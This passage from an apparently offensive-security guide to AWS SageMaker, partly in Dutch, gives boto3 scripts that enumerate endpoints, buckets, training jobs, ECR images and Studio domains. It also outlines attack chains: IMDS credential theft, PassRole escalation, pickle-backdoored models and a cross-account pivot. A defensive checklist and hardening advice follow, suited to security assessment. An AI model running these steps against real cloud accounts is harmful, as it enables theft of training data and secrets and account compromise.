3. Endpoint-enumeratie en -testen

import boto3
 
sm = boto3.client('sagemaker')
runtime = boto3.client('sagemaker-runtime')
 
# Alle endpoints opsommen
endpoints = sm.list_endpoints()['Endpoints']
for ep in endpoints:
    config = sm.describe_endpoint(EndpointName=ep['EndpointName'])
    print(f"Endpoint: {ep['EndpointName']}")
    print(f"  Status: {config['EndpointStatus']}")
    print(f"  Created: {config['CreationTime']}")
 
    # Aanroep proberen
    try:
        response = runtime.invoke_endpoint(
            EndpointName=ep['EndpointName'],
            ContentType='application/json',
            Body='{"inputs": "test"}'
        )
        print(f"  Response: {response['Body'].read()[:200]}")
    except Exception as e:
        print(f"  Error: {e}")

Diepgaande beveiligingsanalyse van endpoints

import boto3
import json
 
sm = boto3.client('sagemaker')
 
def analyze_endpoint_security(endpoint_name):
    """Uitgebreide beveiligingsbeoordeling van een endpoint."""
    # Endpoint-config ophalen
    endpoint = sm.describe_endpoint(EndpointName=endpoint_name)
    config_name = endpoint['EndpointConfigName']
    config = sm.describe_endpoint_config(EndpointConfigName=config_name)
 
    results = {"endpoint": endpoint_name, "findings": []}
 
    # VPC-configuratie controleren
    for variant in config['ProductionVariants']:
        model = sm.describe_model(ModelName=variant['ModelName'])
 
        # Controleren of het model in een VPC draait
        if 'VpcConfig' not in model:
            results["findings"].append({
                "severity": "HIGH",
                "finding": f"Model {variant['ModelName']} not in VPC"
            })
 
        # De execution role van het model controleren
        role_arn = model['ExecutionRoleArn']
        results["findings"].append({
            "severity": "INFO",
            "finding": f"Model role: {role_arn}"
        })
 
        # De bron van de container-image controleren
        container = model.get('PrimaryContainer', {})
        image = container.get('Image', 'Unknown')
        results["findings"].append({
            "severity": "INFO",
            "finding": f"Container image: {image}"
        })
 
        # Controleren op modeldata (S3-pad naar modelartefacten)
        model_data = container.get('ModelDataUrl', 'None')
        if model_data != 'None':
            results["findings"].append({
                "severity": "MEDIUM",
                "finding": f"Model artifacts at: {model_data}"
            })
 
    # Data-capture-configuratie controleren (kan inferentiedata lekken)
    if 'DataCaptureConfig' in config:
        capture = config['DataCaptureConfig']
        if capture.get('EnableCapture'):
            results["findings"].append({
                "severity": "MEDIUM",
                "finding": f"Data capture enabled -> {capture.get('DestinationS3Uri')}"
            })
 
    return results
 
# Analyse uitvoeren voor alle endpoints
for ep in sm.list_endpoints()['Endpoints']:
    analysis = analyze_endpoint_security(ep['EndpointName'])
    print(json.dumps(analysis, indent=2, default=str))

4. Exfiltratie van trainingsdata

# S3-buckets enumereren die door SageMaker worden gebruikt
s3 = boto3.client('s3')
buckets = s3.list_buckets()['Buckets']
sagemaker_buckets = [b for b in buckets if 'sagemaker' in b['Name'].lower()]
 
for bucket in sagemaker_buckets:
    print(f"\nBucket: {bucket['Name']}")
    objects = s3.list_objects_v2(Bucket=bucket['Name'], MaxKeys=20)
    for obj in objects.get('Contents', []):
        print(f"  {obj['Key']} ({obj['Size']} bytes)")

Trainingsdata extraheren uit de jobgeschiedenis

import boto3
 
sm = boto3.client('sagemaker')
s3 = boto3.client('s3')
 
# Recente trainingsjobs opsommen om datalocaties te vinden
jobs = sm.list_training_jobs(
    SortBy='CreationTime',
    SortOrder='Descending',
    MaxResults=20
)
 
for job_summary in jobs['TrainingJobSummaries']:
    job = sm.describe_training_job(
        TrainingJobName=job_summary['TrainingJobName']
    )
    print(f"\nJob: {job['TrainingJobName']}")
    print(f"  Status: {job['TrainingJobStatus']}")
    print(f"  Role: {job['RoleArn']}")
 
    # Extract input data locations (a channel may use a non-S3 data source)
    for channel in job.get('InputDataConfig', []):
        s3_uri = channel['DataSource'].get('S3DataSource', {}).get('S3Uri', 'N/A')
        print(f"  Input ({channel['ChannelName']}): {s3_uri}")
 
    # Extract the output location
    output_uri = job['OutputDataConfig']['S3OutputPath']
    print(f"  Output: {output_uri}")
 
    # Extract model artifacts (the trained model)
    if 'ModelArtifacts' in job:
        model_uri = job['ModelArtifacts']['S3ModelArtifacts']
        print(f"  Model: {model_uri}")
 
    # Check hyperparameters (they may contain secrets or API keys)
    hyperparams = job.get('HyperParameters', {})
    for key, value in hyperparams.items():
        if any(kw in key.lower() for kw in
               ['key', 'secret', 'token', 'password', 'api']):
            print(f"  [!] Suspicious hyperparameter: {key}={value[:20]}...")
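
The name-based check above misses secrets stored under innocuous keys. A minimal sketch that also inspects the values, assuming a small illustrative pattern set; the function name `find_secret_like_hyperparameters` and the two patterns are assumptions for illustration, not part of the original tooling:

```python
import re

# Keywords taken from the check above; the value patterns are illustrative only.
NAME_KEYWORDS = ("key", "secret", "token", "password", "api")
VALUE_PATTERNS = {
    # AWS access key IDs start with AKIA (long-term) or ASIA (temporary).
    "aws_access_key_id": re.compile(r"\b(?:AKIA|ASIA)[0-9A-Z]{16}\b"),
    "private_key_block": re.compile(r"-----BEGIN [A-Z ]*PRIVATE KEY-----"),
}


def find_secret_like_hyperparameters(hyperparams):
    """Return (key, reason) pairs for hyperparameters that look sensitive."""
    hits = []
    for key, value in hyperparams.items():
        # First pass: suspicious key name, same logic as the original loop.
        if any(kw in key.lower() for kw in NAME_KEYWORDS):
            hits.append((key, "name"))
            continue
        # Second pass: the value itself matches a known secret format.
        for label, pattern in VALUE_PATTERNS.items():
            if pattern.search(str(value)):
                hits.append((key, label))
                break
    return hits


if __name__ == "__main__":
    sample = {"epochs": "10", "extra_args": "--id AKIAABCDEFGHIJKLMNOP"}
    print(find_secret_like_hyperparameters(sample))
```

It can be called with the `HyperParameters` dictionary returned by `describe_training_job`. Reporting only the key and the reason, rather than part of the value, avoids copying the secret into logs.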

5. Attacks on ECR container images

import boto3
import json
 
ecr = boto3.client('ecr')
 
# List all repositories
repos = ecr.describe_repositories()['repositories']
ml_repos = [r for r in repos if any(
    kw in r['repositoryName'].lower()
    for kw in ['sagemaker', 'ml', 'model', 'inference', 'training']
)]
 
for repo in ml_repos:
    print(f"\nRepository: {repo['repositoryName']}")
    print(f"  URI: {repo['repositoryUri']}")
    print(f"  Created: {repo['createdAt']}")
 
    # Check image scan findings
    images = ecr.list_images(
        repositoryName=repo['repositoryName'],
        maxResults=5
    )['imageIds']
 
    for image in images:
        if 'imageTag' in image:
            print(f"  Image: {image['imageTag']}")
            try:
                scan = ecr.describe_image_scan_findings(
                    repositoryName=repo['repositoryName'],
                    imageId=image
                )
                vulns = scan['imageScanFindings']['findingSeverityCounts']
                print(f"    Vulnerabilities: {json.dumps(vulns)}")
            except ecr.exceptions.ScanNotFoundException:
                print(f"    [!] No vulnerability scan results")
 
    # Check the repository policy (who can push/pull)
    try:
        policy = ecr.get_repository_policy(
            repositoryName=repo['repositoryName']
        )
        policy_doc = json.loads(policy['policyText'])
        for stmt in policy_doc.get('Statement', []):
            print(f"  Policy: {stmt.get('Effect')} - "
                  f"{stmt.get('Principal', {})}")
    except ecr.exceptions.RepositoryPolicyNotFoundException:
        print(f"  No repository policy (default account access only)")
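
Printing each statement's principal leaves the judgment to the reader. A minimal sketch that flags statements open to every AWS principal, and whether they include push actions, is shown here; the function names and the `WRITE_ACTIONS` set are assumptions chosen for illustration:

```python
# ECR actions involved in pushing an image, plus wildcards that include them.
WRITE_ACTIONS = {
    "ecr:PutImage", "ecr:InitiateLayerUpload", "ecr:UploadLayerPart",
    "ecr:CompleteLayerUpload", "ecr:*", "*",
}


def principal_is_public(principal):
    """True when a Principal element matches every AWS principal."""
    if principal == "*":
        return True
    if isinstance(principal, dict):
        aws = principal.get("AWS", [])
        values = [aws] if isinstance(aws, str) else list(aws)
        return "*" in values
    return False


def public_statements(policy_doc):
    """Return Allow statements whose principal is a wildcard."""
    statements = policy_doc.get("Statement", [])
    if isinstance(statements, dict):  # a single statement may be a bare object
        statements = [statements]
    findings = []
    for stmt in statements:
        if stmt.get("Effect") != "Allow":
            continue
        if not principal_is_public(stmt.get("Principal")):
            continue
        actions = stmt.get("Action", [])
        actions = [actions] if isinstance(actions, str) else list(actions)
        findings.append({
            "sid": stmt.get("Sid"),
            "push_allowed": any(a in WRITE_ACTIONS for a in actions),
            "has_condition": "Condition" in stmt,
        })
    return findings
```

The input is the parsed `policy_doc` from the loop above. A wildcard statement with `push_allowed` set and no condition would let any principal replace an inference image.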

6. Exploiting SageMaker Studio domains

import boto3
 
sm = boto3.client('sagemaker')
efs = boto3.client('efs')
 
# List Studio domains
domains = sm.list_domains()['Domains']
for domain in domains:
    detail = sm.describe_domain(DomainId=domain['DomainId'])
    print(f"\nDomain: {detail['DomainName']}")
    print(f"  Auth: {detail['AuthMode']}")
    print(f"  VPC: {detail.get('VpcId', 'No VPC')}")
    print(f"  EFS: {detail.get('HomeEfsFileSystemId', 'N/A')}")
 
    # The default execution role applies to every user profile that does not set its own
    default_settings = detail.get('DefaultUserSettings', {})
    print(f"  Default role: {default_settings.get('ExecutionRole', 'N/A')}")
 
    # List user profiles
    profiles = sm.list_user_profiles(DomainIdEquals=domain['DomainId'])
    for profile in profiles['UserProfiles']:
        user_detail = sm.describe_user_profile(
            DomainId=domain['DomainId'],
            UserProfileName=profile['UserProfileName']
        )
        user_role = user_detail.get('UserSettings', {}).get('ExecutionRole')
        print(f"  User: {profile['UserProfileName']} "
              f"(role: {user_role or 'uses default'})")
 
    # Check whether the EFS file system is accessible
    if 'HomeEfsFileSystemId' in detail:
        efs_id = detail['HomeEfsFileSystemId']
        try:
            fs = efs.describe_file_systems(FileSystemId=efs_id)
            print(f"  EFS size: {fs['FileSystems'][0]['SizeInBytes']['Value']} bytes")
            # Check mount targets for network exposure
            mounts = efs.describe_mount_targets(FileSystemId=efs_id)
            for mt in mounts['MountTargets']:
                print(f"  EFS mount: {mt['IpAddress']} in {mt['SubnetId']}")
        except Exception as e:
            print(f"  EFS access error: {e}")

Defensive assessment checklist

Control area	What to verify	Common finding
IAM roles	Least-privilege execution roles per component	`AmazonSageMakerFullAccess` attached to all roles
IMDS	IMDSv2 enforced on notebook instances	IMDSv1 still enabled (default on older instances)
Network	VPC isolation for notebooks, training, and endpoints	No VPC configuration (default)
S3	Bucket policies, encryption, versioning, access logging	Public or overly permissive bucket policies
ECR	Image scanning, repository policies, immutable tags	No vulnerability scanning configured
Logging	CloudTrail, CloudWatch, SageMaker Experiments logging	Incomplete logging of SageMaker API calls
Encryption	KMS keys for S3, EBS, EFS, and inter-node training	Default AWS-managed keys (no customer control)
Endpoint	IAM authorization, VPC endpoints, resource policies	No IAM conditions on endpoint invocation
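
Several rows of this checklist can be evaluated directly from the response of `describe_notebook_instance`. The sketch below is a minimal example under that assumption; the function name `check_notebook_instance` and the finding texts are illustrative, and it covers only notebook instances, not training jobs or endpoints:

```python
def check_notebook_instance(desc):
    """Map a describe_notebook_instance response to checklist findings."""
    findings = []

    # IMDS row: version "2" means IMDSv1 requests are rejected.
    imds = desc.get("InstanceMetadataServiceConfiguration", {})
    if imds.get("MinimumInstanceMetadataServiceVersion") != "2":
        findings.append("IMDSv2 not enforced")

    # Network row: direct internet access and missing subnet.
    if desc.get("DirectInternetAccess") == "Enabled":
        findings.append("Direct internet access enabled")
    if not desc.get("SubnetId"):
        findings.append("No VPC subnet configured")

    # Encryption row: no customer-managed key on the attached volume.
    if not desc.get("KmsKeyId"):
        findings.append("No customer-managed KMS key configured")

    # Root access makes persistence on a compromised notebook easier.
    if desc.get("RootAccess") == "Enabled":
        findings.append("Root access enabled")

    return findings
```

A typical call would be `check_notebook_instance(sm.describe_notebook_instance(NotebookInstanceName=name))`, with `sm` being a boto3 SageMaker client and `name` a placeholder for a real instance name.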

Recommended hardening

Replace AmazonSageMakerFullAccess with custom policies scoped to specific S3 paths, ECR repositories, and SageMaker resources.
Enforce IMDSv2 on all notebook instances by setting MinimumInstanceMetadataServiceVersion to 2.
Place all components in a VPC with private subnets and VPC endpoints for S3, ECR, the SageMaker API, and SageMaker Runtime.
Enable S3 bucket versioning and access logging on all SageMaker-related buckets to detect unauthorized access or modification.
Use separate IAM roles for notebooks, training jobs, and endpoints, each limited to the resources it needs.
Enable ECR image scanning and enforce image immutability to reduce the risk of supply chain attacks.
Enable CloudTrail data events for S3 buckets that hold training data and model artifacts.
Use SageMaker Model Cards and the Model Registry to track model provenance and prevent unauthorized model deployment.
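
As an illustration of the first recommendation, the following sketch builds an S3 policy limited to one prefix in one bucket. The bucket name, prefix, statement IDs, and the helper name `build_scoped_s3_policy` are hypothetical; a real replacement for AmazonSageMakerFullAccess would also need scoped ECR, CloudWatch, and SageMaker statements:

```python
import json


def build_scoped_s3_policy(bucket, prefix):
    """Return an IAM policy document restricted to s3://bucket/prefix/."""
    prefix = prefix.strip("/")
    return {
        "Version": "2012-10-17",
        "Statement": [
            {
                # Listing is allowed only for keys under the project prefix.
                "Sid": "ListProjectPrefix",
                "Effect": "Allow",
                "Action": "s3:ListBucket",
                "Resource": f"arn:aws:s3:::{bucket}",
                "Condition": {"StringLike": {"s3:prefix": [f"{prefix}/*"]}},
            },
            {
                # Object reads and writes are limited to the same prefix.
                "Sid": "ReadWriteProjectObjects",
                "Effect": "Allow",
                "Action": ["s3:GetObject", "s3:PutObject"],
                "Resource": f"arn:aws:s3:::{bucket}/{prefix}/*",
            },
        ],
    }


if __name__ == "__main__":
    # Hypothetical bucket and prefix, for illustration only.
    print(json.dumps(build_scoped_s3_policy("example-ml-bucket", "team-a/training"), indent=2))
```

Generating one such document per role (notebook, training, endpoint) keeps the roles separate, in line with the fifth recommendation.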

Common attack chains

Chain 1: From notebook to full account compromise

1. Initial access: Compromised data scientist credentials or malicious .ipynb file
2. IMDS credential harvesting from notebook instance
3. Enumerate IAM role permissions -- discover AmazonSageMakerFullAccess
4. List S3 buckets matching sagemaker-* pattern
5. Access training data, model artifacts, and pipeline outputs
6. Discover iam:PassRole permission in the execution role
7. Launch training job with a higher-privilege role
8. Use escalated role to access non-SageMaker resources (RDS, DynamoDB, etc.)
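
Steps 6 and 7 of this chain depend on an `iam:PassRole` grant that is not scoped to specific roles. A minimal sketch for spotting such grants in a policy document follows; the function name and the returned fields are assumptions, and the check is deliberately simple (it ignores `NotAction`, `NotResource`, and partial wildcards such as `iam:Pass*`):

```python
import json


def _as_list(value):
    """Normalize a policy element that may be a string, a list, or absent."""
    if value is None:
        return []
    return [value] if isinstance(value, str) else list(value)


def find_unrestricted_passrole(policy_doc):
    """Return Allow statements granting iam:PassRole on wildcard resources."""
    statements = policy_doc.get("Statement", [])
    if isinstance(statements, dict):
        statements = [statements]
    findings = []
    for stmt in statements:
        if stmt.get("Effect") != "Allow":
            continue
        actions = [a.lower() for a in _as_list(stmt.get("Action"))]
        grants_passrole = any(a in ("iam:passrole", "iam:*", "*") for a in actions)
        wildcard_resource = any(
            r == "*" or r.endswith(":role/*") for r in _as_list(stmt.get("Resource"))
        )
        if grants_passrole and wildcard_resource:
            condition = json.dumps(stmt.get("Condition", {})).lower()
            findings.append({
                "sid": stmt.get("Sid"),
                # iam:PassedToService narrows which service may receive the role.
                "limited_to_service": "iam:passedtoservice" in condition,
            })
    return findings
```

The input can be the `Document` of a policy version retrieved with `iam.get_policy_version`. A finding with `limited_to_service` set is still worth reviewing, because passing any role to SageMaker is exactly what step 7 requires.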

Chain 2: Model registry poisoning

1. Gain access to a SageMaker execution role with model registry permissions
2. Download the latest approved model from S3
3. Modify model artifact to include a backdoor (e.g., pickle-based RCE in PyTorch model)
4. Register the modified model as a new version in the model registry
5. If automatic deployment is configured, the backdoored model reaches production
6. Backdoored model executes attacker code on every inference request

Chain 3: Cross-account pivot via an endpoint

1. Discover SageMaker endpoint with cross-account IAM trust
2. Invoke endpoint with crafted payloads to test for model vulnerabilities
3. If model inference container has outbound network access, use it as proxy
4. Leverage endpoint role's cross-account permissions to access resources
   in other AWS accounts within the organization
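
Step 1 of this chain can be approximated from the defender's side by listing which external accounts a role trusts. The following sketch parses a role trust policy for that purpose; the function name and account IDs are placeholders, and only `AWS` principals are considered (federated and service principals are ignored):

```python
import re

# Matches the 12-digit account ID inside an IAM or STS principal ARN.
ACCOUNT_IN_ARN = re.compile(r"^arn:aws[a-z-]*:(?:iam|sts)::(\d{12}):")


def _as_list(value):
    """Normalize a policy element that may be a string, a list, or absent."""
    if value is None:
        return []
    return [value] if isinstance(value, str) else list(value)


def external_trusted_accounts(trust_policy, own_account_id):
    """Return account IDs (or "*") trusted by the role, excluding our own."""
    statements = trust_policy.get("Statement", [])
    if isinstance(statements, dict):
        statements = [statements]
    external = set()
    for stmt in statements:
        if stmt.get("Effect") != "Allow":
            continue
        principal = stmt.get("Principal", {})
        if principal == "*":
            external.add("*")
            continue
        for value in _as_list(principal.get("AWS")):
            if value == "*":
                external.add("*")
                continue
            # A principal may be a bare account ID or a full ARN.
            match = ACCOUNT_IN_ARN.match(value)
            account = value if re.fullmatch(r"\d{12}", value) else (
                match.group(1) if match else None
            )
            if account and account != own_account_id:
                external.add(account)
    return sorted(external)
```

The trust policy is available as `AssumeRolePolicyDocument` in the response of `iam.get_role`. Any account ID returned here should map to a known, intended relationship.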

MITRE ATLAS mapping for SageMaker attacks

Attack technique	ATLAS ID	SageMaker-specific context
IMDS credential harvesting	AML.TA0002 (Initial Access)	Notebook execution roles with broad S3/ECR access
S3 training data access	AML.T0000 (Search for Victim's Data)	The default `sagemaker-*` bucket naming convention makes discovery easier
Endpoint enumeration	AML.T0002 (Active Scanning)	`sagemaker:ListEndpoints` reveals all deployed models
Model extraction via endpoint	AML.T0024 (Model Extraction)	Endpoint invocation with systematic queries
ECR image tampering	AML.T0018 (Backdoor ML Model)	Replacing the inference container image in ECR
Training data poisoning	AML.T0020 (Data Poisoning)	Modifying S3 training data between pipeline runs

Related topics

Cloud AI infrastructure -- Cross-platform overview
API security -- Fundamentals of endpoint security
Model supply chain -- Security of model artifacts

